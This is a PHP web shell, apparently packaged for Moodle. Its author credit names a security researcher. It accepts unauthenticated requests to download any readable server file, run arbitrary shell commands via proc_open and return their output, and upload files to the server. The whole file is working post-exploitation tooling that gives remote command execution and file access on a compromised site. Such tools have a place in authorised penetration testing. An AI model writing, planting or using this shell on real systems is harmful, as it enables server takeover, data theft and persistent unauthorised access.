<?php

/**
 * @package  moodle_webshell
 * @copyright 2022, Remi GASCOU (Podalirius) <podalirius@protonmail.com>
 */

$chunk_size = 1024;
$action = $_REQUEST["action"];

if ($action == "download") {
    $path_to_file = realpath($_REQUEST["path"]);

    if ($path_to_file && file_exists($path_to_file)) {
        http_response_code(200);
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($path_to_file) . '"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($path_to_file));
        flush();
        readfile($path_to_file);
        die();
    } else {
        http_response_code(404);
        header("Content-Type: application/json");
        echo json_encode(
            array(
                "message" => "Path " . $path_to_file . " does not exist or is not readable.",
                "path" => $path_to_file
            )
        );
    }

} elseif ($action == "exec") {
    $command = escapeshellcmd($_REQUEST["cmd"]);

    // Spawn shell process
    $descriptorspec = array(
        0 => array("pipe", "w"),  // stdout is a pipe that the child will write to
        1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
        2 => array("pipe", "w")   // stderr is a pipe that the child will write to
    );

    chdir("/");
    $process = proc_open($command, $descriptorspec, $pipes);

    if (!is_resource($process)) {
        // Can't spawn process
        exit(1);
    }

    // Read STDOUT
    $stdout = ""; $buffer = "";
    do {
        $buffer = fread($pipes[1], $chunk_size);
        $stdout .= $buffer;
    } while ((!feof($pipes[1])) && (strlen($buffer) != 0));

    // Read STDERR
    $stderr = ""; $buffer = "";
    do {
        $buffer = fread($pipes[2], $chunk_size);
        $stderr .= $buffer;
    } while ((!feof($pipes[2])) && (strlen($buffer) != 0));

    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);

    header('Content-Type: application/json');
    echo json_encode(
        array(
            'stdout' => $stdout,
            'stderr' => $stderr,
            'exec' => $command
        )
    );

} elseif ($action == "upload") {
    $upload_dir = __DIR__ . '/uploads/';
    if (!is_dir($upload_dir)) {
        mkdir($upload_dir, 0755, true); // Create directory if it doesn't exist
    }

    if (isset($_FILES['file'])) {
        $file_name = basename($_FILES['file']['name']);
        $file_path = $upload_dir . $file_name;

        // Move uploaded file to target directory
        if (move_uploaded_file($_FILES['file']['tmp_name'], $file_path)) {
            http_response_code(200);
            echo json_encode(["message" => "File uploaded successfully.", "path" => $file_path]);
        } else {
            http_response_code(500);
            echo json_encode(["message" => "Failed to upload file."]);
        }
    } else {
        http_response_code(400);
        echo json_encode(["message" => "No file was uploaded."]);
    }
}

?>
